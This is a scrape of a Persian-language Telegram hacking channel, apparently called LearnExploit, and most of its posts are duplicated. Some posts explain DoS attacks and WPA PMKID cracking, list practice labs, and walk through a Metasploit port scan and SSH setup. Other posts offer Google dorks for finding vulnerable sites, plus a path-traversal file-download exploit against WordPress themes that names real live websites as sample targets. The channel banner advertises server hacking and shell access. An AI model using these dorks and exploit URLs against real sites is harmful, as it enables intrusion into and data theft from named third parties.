✔️ تفاوت #حملات dos و ddos
-> در حملات dos هکر فقط از سیستم خود به تارگت حمله میکند. ولی در حملات ddos هکر از چندین سرور برای حمله خود استفاده میکند.
@LearnExploit
-> در حملات dos هکر فقط از سیستم خود به تارگت حمله میکند. ولی در حملات ddos هکر از چندین سرور برای حمله خود استفاده میکند.
@LearnExploit
✔️ #روش_جدید crack پسورد WPA/WPA2 در شبکه وایرلس
-> یک روش جدید کشف شده است که به راحتی شناسه کلید اصلی (PMKID) از یک مودم روتر را با استفاده از امنیت WPA/WPA2 بازیابی می کند و از آن برای شکستن رمز عبور بی سیم مودم روتر استفاده کرد.
-> در حالی که در روش قبلی crack کردن، هکر باید منتظر می ماند تا کاربر به شبکه وایرلس login کند تا بتواند پسورد او را پیدا کند. در روش جدید، مهاجم فقط به یک frame برای درخواست به access point نیاز دارد.
-> این روش تقریبا در همه مودم روترها که از شبکه های 802.11i/p/q/r استفاده می کنند کار می کند.
-> این روش با استخراج RSN IE از یک فریم EAPOL کار می کند. RSN IE یک فیلد است که در آن PMKID که توسط یک مودم روتر زمانی که در حال احراز هویت کاربر است به وجود می آید.
-> این PMK بخشی از 4way handshake است که برای تایید Pre-Shared Key (PSK) و یا پسورد وایرلس استفاده می شود.
-> از آن جایی که crack پسورد با این روش بستگی به میزان پیچیدگی پسورد دارد بنابراین توصیه می شود برای حفاظت از شبکه بی سیم خود در برابر چنین حملاتی از پسورد پیچیده استفاده کنید. پسوردی پیچیده است که شامل حروف بزرگ، حروف کوچک، سمبل ها و اعداد باشد.
--> هرچه طول پسورد بیشتر و پیجیده تر باشد برای crack آن به زمان بیشتری نیاز است.
#itpajoohan
@LearnExploit
-> یک روش جدید کشف شده است که به راحتی شناسه کلید اصلی (PMKID) از یک مودم روتر را با استفاده از امنیت WPA/WPA2 بازیابی می کند و از آن برای شکستن رمز عبور بی سیم مودم روتر استفاده کرد.
-> در حالی که در روش قبلی crack کردن، هکر باید منتظر می ماند تا کاربر به شبکه وایرلس login کند تا بتواند پسورد او را پیدا کند. در روش جدید، مهاجم فقط به یک frame برای درخواست به access point نیاز دارد.
-> این روش تقریبا در همه مودم روترها که از شبکه های 802.11i/p/q/r استفاده می کنند کار می کند.
-> این روش با استخراج RSN IE از یک فریم EAPOL کار می کند. RSN IE یک فیلد است که در آن PMKID که توسط یک مودم روتر زمانی که در حال احراز هویت کاربر است به وجود می آید.
-> این PMK بخشی از 4way handshake است که برای تایید Pre-Shared Key (PSK) و یا پسورد وایرلس استفاده می شود.
-> از آن جایی که crack پسورد با این روش بستگی به میزان پیچیدگی پسورد دارد بنابراین توصیه می شود برای حفاظت از شبکه بی سیم خود در برابر چنین حملاتی از پسورد پیچیده استفاده کنید. پسوردی پیچیده است که شامل حروف بزرگ، حروف کوچک، سمبل ها و اعداد باشد.
--> هرچه طول پسورد بیشتر و پیجیده تر باشد برای crack آن به زمان بیشتری نیاز است.
#itpajoohan
@LearnExploit
⚠️هشدار جدی⚠️
یک گروه هکری درحال پخش یک بد افزار از طریق اکانت جعلی به نام تلگرام هستن.
این پیام رو برای دوستاتون بفرستین تا اونا هم با خبر بشن
@LearnExploit
یک گروه هکری درحال پخش یک بد افزار از طریق اکانت جعلی به نام تلگرام هستن.
این پیام رو برای دوستاتون بفرستین تا اونا هم با خبر بشن
@LearnExploit
#dos_ddos
🔖آشنایی با انواع #حملات به سرور ها و سایت ها
🔴حمله #DOS که برگرفته از Denial Of Service می باشد و به معنی ، جلوگیری از ارائه خدمات و از دسترس خارج شدن سایتها و سرور های مقصد میباشد.
🔸هدف اصلی از این حمله از دسترس خارج کردن سرویس برای کاربران می باشد. و این کار را با ایجاد وقفه در دسترسی کاربران به سرور و سایت انجام میدهند.
🔸حمله کننده ،با فرستادن درخواستهای زیادی به سرور مد نظر و در نتیجه ایجاد ترافیک بالا و استفاده بیش از منابع سرور باعث اختلال در استفاده کاربران سرویس مد نظر می شوند و در نتیجه با ادامه دادن این حملات حتی میتواند باعث لود بسیار بالای #سرور و درنتیجه دان شدن آن شود و در نتیجه سرور از دسترس خارج شود.
‼️نکته : در حملات DOS معمولا هکر ها از یک سرور برای انجام حملات خود استفاده میکنند.
🔴حملات DDOS به همان حملات DOS گفته میشود و تنها تفاوت آن در این است که در این نوع حمله برعکس حمله DOS که هکرها به جای یک سرور، از مجموعه ای از سرور ها اقدام به حملات میکنند و با گسترش حملات خود و با ایجاد ترافیک جعلی لود سرور و ترافیک را بالا میبرند و در نتیجه از این طریق سرویس را از دسترس خارج میکنند.
🔸متاسفانه بخاطر تعداد زیاد بودن سرور های حمله کننده جلوگیری از حمله #DDOS بصورت نرم افزاری بسیار پیچیده و تقریبا غیر ممکن است و باید زیر ساخت #دیتاسنتر هاست یا همان میزبان سرور ، جلوگیر این نوع حملات باشد.
@LearnExploit
🔖آشنایی با انواع #حملات به سرور ها و سایت ها
🔴حمله #DOS که برگرفته از Denial Of Service می باشد و به معنی ، جلوگیری از ارائه خدمات و از دسترس خارج شدن سایتها و سرور های مقصد میباشد.
🔸هدف اصلی از این حمله از دسترس خارج کردن سرویس برای کاربران می باشد. و این کار را با ایجاد وقفه در دسترسی کاربران به سرور و سایت انجام میدهند.
🔸حمله کننده ،با فرستادن درخواستهای زیادی به سرور مد نظر و در نتیجه ایجاد ترافیک بالا و استفاده بیش از منابع سرور باعث اختلال در استفاده کاربران سرویس مد نظر می شوند و در نتیجه با ادامه دادن این حملات حتی میتواند باعث لود بسیار بالای #سرور و درنتیجه دان شدن آن شود و در نتیجه سرور از دسترس خارج شود.
‼️نکته : در حملات DOS معمولا هکر ها از یک سرور برای انجام حملات خود استفاده میکنند.
🔴حملات DDOS به همان حملات DOS گفته میشود و تنها تفاوت آن در این است که در این نوع حمله برعکس حمله DOS که هکرها به جای یک سرور، از مجموعه ای از سرور ها اقدام به حملات میکنند و با گسترش حملات خود و با ایجاد ترافیک جعلی لود سرور و ترافیک را بالا میبرند و در نتیجه از این طریق سرویس را از دسترس خارج میکنند.
🔸متاسفانه بخاطر تعداد زیاد بودن سرور های حمله کننده جلوگیری از حمله #DDOS بصورت نرم افزاری بسیار پیچیده و تقریبا غیر ممکن است و باید زیر ساخت #دیتاسنتر هاست یا همان میزبان سرور ، جلوگیر این نوع حملات باشد.
@LearnExploit
Fluxion.
هک WPA/WPA2 از طریق مهندسی اجتماعی!
#برگام🍃
Git: https://github.com/FluxionNetwork/fluxion
@LearnExploit
هک WPA/WPA2 از طریق مهندسی اجتماعی!
#برگام🍃
Git: https://github.com/FluxionNetwork/fluxion
@LearnExploit
✔️ معرفی سه محیط آزمایشگاهی برای تمرین باگ های #وب_هکینگ
-> محیط آزمایشگاهی DVWA
github.com/ethicalhack3r/DVWA
-> محیط آزمایشگاهی BtsLab
github.com/CSPF-Founder/btslab
-> محیط آزمایشگاهی Bwapp
github.com/raesene/bWAPP
@LearnExploit
-> محیط آزمایشگاهی DVWA
github.com/ethicalhack3r/DVWA
-> محیط آزمایشگاهی BtsLab
github.com/CSPF-Founder/btslab
-> محیط آزمایشگاهی Bwapp
github.com/raesene/bWAPP
@LearnExploit
GitHub
GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Web Application (DVWA). Contribute to digininja/DVWA development by creating an account on GitHub.
@LearnExploit
✔️ #اسکن پورت های یک سیستم در متااسپلویت
-> Type in Terminal
1- استارت سرویس postgresql
service postgresql start
====================
2- اجرا کردن متااسپلويت
msfconsole
=================
3- فراخوانی ماژول پورت اسکنر
use auxiliary/scanner/portscan/tcp
=====================================
4- چک کردن تنظيمات ماژول
show optinos
=====================================
5- ست کردن پورت هايي که بايد اسکن شوند
set PORTS 1-500
=====================================
6- ست کردن اي پي تارگت
set RHOST 192.168.1.1
=====================================
7- اجرا کردن اسکن
exploit
===================================
✔️ #اسکن پورت های یک سیستم در متااسپلویت
-> Type in Terminal
1- استارت سرویس postgresql
service postgresql start
====================
2- اجرا کردن متااسپلويت
msfconsole
=================
3- فراخوانی ماژول پورت اسکنر
use auxiliary/scanner/portscan/tcp
=====================================
4- چک کردن تنظيمات ماژول
show optinos
=====================================
5- ست کردن پورت هايي که بايد اسکن شوند
set PORTS 1-500
=====================================
6- ست کردن اي پي تارگت
set RHOST 192.168.1.1
=====================================
7- اجرا کردن اسکن
exploit
===================================
✔️ #نصب سرویس ssh در کالی لینوکس و استفاده از کالی در شبکه لوکال
-> توضیح کامل در پست زیر:
@LearnExploit
-> توضیح کامل در پست زیر:
@LearnExploit
✔️ #نصب سرویس ssh در کالی لینوکس و استفاده از آن به صورت لوکال در شبکه
Type in Terminal:
-> نصب سرویس :
apt-get install openssh-server
================================
-> نصب سرویس کلاینت :
apt-get install openssh-client
================================
-> استارت سرویس:
service ssh start
================================
-> رفتن به پوشه ssh
cd /etc/ssh
================================
-> ویرایش فایل کانفیگ با ویرایشگر متنی :
nano sshd_config
================================
-> این خط را پیدا کنید و پاکش کنید :
PermitRootLogin without-password
================================
-> سپس این متن رو به جای متن قبلی بنویسد :
PermitRootLogin yes
================================
-> سیو کردن :
ctrl + x = y = enter
================================
-> سرویس را ریستارت کنید :
service ssh restart
================================
-> ایپی سیستم خود را پیدا کنید :
ifconfig
================================
-> سپس درون شبکه خود (برای مثال کلاینت ویندوزی) نرم افزار PuTTY رو نصب کنید و با ایپی سرور که به دست اوردین لاگین کنید.
@LearnExploit
Type in Terminal:
-> نصب سرویس :
apt-get install openssh-server
================================
-> نصب سرویس کلاینت :
apt-get install openssh-client
================================
-> استارت سرویس:
service ssh start
================================
-> رفتن به پوشه ssh
cd /etc/ssh
================================
-> ویرایش فایل کانفیگ با ویرایشگر متنی :
nano sshd_config
================================
-> این خط را پیدا کنید و پاکش کنید :
PermitRootLogin without-password
================================
-> سپس این متن رو به جای متن قبلی بنویسد :
PermitRootLogin yes
================================
-> سیو کردن :
ctrl + x = y = enter
================================
-> سرویس را ریستارت کنید :
service ssh restart
================================
-> ایپی سیستم خود را پیدا کنید :
ifconfig
================================
-> سپس درون شبکه خود (برای مثال کلاینت ویندوزی) نرم افزار PuTTY رو نصب کنید و با ایپی سرور که به دست اوردین لاگین کنید.
@LearnExploit
❤1👍1
✔️ چند نمونه دورک برای انواع #اسیب_پذیری تحت وب
-> باگ sql
inurl:details.php?id= [SQL Injection]
-> باگ lfi
inurl:download.php?file= [File Inclusion]
-> باگ اپلود فایل
inurl:files/upload.php [File Upload]
-> باگ بایپس پنل ادمین
inurl:admin/login.php [Authentication Bypass]
-> باگ خواندن کانفیگ
inurl:ftp.cfg | intext:md5pwd:
@LearnExploit
-> باگ sql
inurl:details.php?id= [SQL Injection]
-> باگ lfi
inurl:download.php?file= [File Inclusion]
-> باگ اپلود فایل
inurl:files/upload.php [File Upload]
-> باگ بایپس پنل ادمین
inurl:admin/login.php [Authentication Bypass]
-> باگ خواندن کانفیگ
inurl:ftp.cfg | intext:md5pwd:
@LearnExploit
❤1
✔️ ساعاتی پیش #اکسپلویت آسیب پذیری از نوع DoS برای نرم افزار و اسکنر معروف Acunetix WVS منتشر شد.
🌐 exploit-db.com/exploits/45186/
@LearnExploit
🌐 exploit-db.com/exploits/45186/
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش نحوه ی اسیب پذیری sql در پنل ادمین #Leraning #sqli in #admin panel —— t.me.learnexploit 0Day.Todat
سلام دوستان ببخشید چند وقتی نبودم...
=
اموزش نحوه ی اسیب پذیری sql در پنل ادمین
#Leraning #sqli in #admin panel
=
در این اموزش یاد میگیری که :
1 - نحوه پبدا کردن اسیب پذیری در پنل ادمین
2 - تحلیل کد php ان
3 - نحوه ی نفوذ
4 - نحوه ی رفع (patch) باگ
=
dl link : yon.ir/UPal2
video in worklearning : yon.ir/zO6yH
————-
t.me/learnexploit
=
اموزش نحوه ی اسیب پذیری sql در پنل ادمین
#Leraning #sqli in #admin panel
=
در این اموزش یاد میگیری که :
1 - نحوه پبدا کردن اسیب پذیری در پنل ادمین
2 - تحلیل کد php ان
3 - نحوه ی نفوذ
4 - نحوه ی رفع (patch) باگ
=
dl link : yon.ir/UPal2
video in worklearning : yon.ir/zO6yH
————-
t.me/learnexploit
file.php
2.6 KB
تمام توضیحات در این فایل قرار دارد.
اسیب پذیری فایل دانلود در تم وردپرس
#Exploit - #Dork - #WP - #Theme
--------
#Title : UWordpress dreamsmiths Themes Arbitrary File Download
#Dorks :
1. inurl:/wp-content/themes/fiestaresidences/
2. inurl:wp-content/themes/hsv/
3. inurl:wp-content/themes/erinvale/
#P0c :
نحوه ی اکسپلویت یکی از اکسپلویت های زیر رو به URL تارگت خود اضافه کنید.
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
#Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
/--//--//--//--//--//--//--//--/
T.me/LearnExploit
0Day.Today Boy's
#Exploit - #Dork - #WP - #Theme
--------
#Title : UWordpress dreamsmiths Themes Arbitrary File Download
#Dorks :
1. inurl:/wp-content/themes/fiestaresidences/
2. inurl:wp-content/themes/hsv/
3. inurl:wp-content/themes/erinvale/
#P0c :
نحوه ی اکسپلویت یکی از اکسپلویت های زیر رو به URL تارگت خود اضافه کنید.
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
#Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
/--//--//--//--//--//--//--//--/
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today